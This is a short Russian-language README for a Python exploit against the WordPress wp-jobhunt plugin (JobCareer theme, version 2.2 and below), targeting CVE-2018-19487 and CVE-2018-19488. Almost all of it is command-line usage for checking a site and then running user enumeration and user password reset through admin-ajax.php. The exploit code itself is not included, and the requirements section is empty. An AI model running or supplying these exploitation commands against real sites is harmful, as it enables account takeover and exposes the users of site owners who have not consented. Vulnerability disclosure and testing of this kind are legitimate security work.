
CVE-2018-19487, CVE-2018-19488, эксплойт для плагина WordPress wp-jobhunt
CVE-2018-19487, CVE-2018-19488, эксплойт для плагина WordPress wp-jobhunt
Плагин wp-jobhunt используется с темой JobCareer:
https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636 (см. журнал изменений внизу)
Python эксплойт для CVE-2018-19487 (раскрытие информации о пользователях через AJAX) и CVE-2018-19488 (сброс пароля пользователя через AJAX) для версии 2.2 и ниже.
ТРЕБОВАНИЯ:
КАК ИСПОЛЬЗОВАТЬ:
Проверка уязвимости к перечислению пользователей:
python poc.py --checkenum https://wpsite/path/to/wp-admin/admin-ajax.php
Проверка уязвимости к сбросу пароля пользователя:
python poc.py --checkreset https://wpsite/path/to/wp-admin/admin-ajax.php
Эксплуатация перечисления пользователей:
python poc.py --enum https://wpsite/path/to/wp-admin/admin-ajax.php
Эксплуатация сброса пароля пользователя:
python poc.py --reset https://wpsite/path/to/wp-admin/admin-ajax.php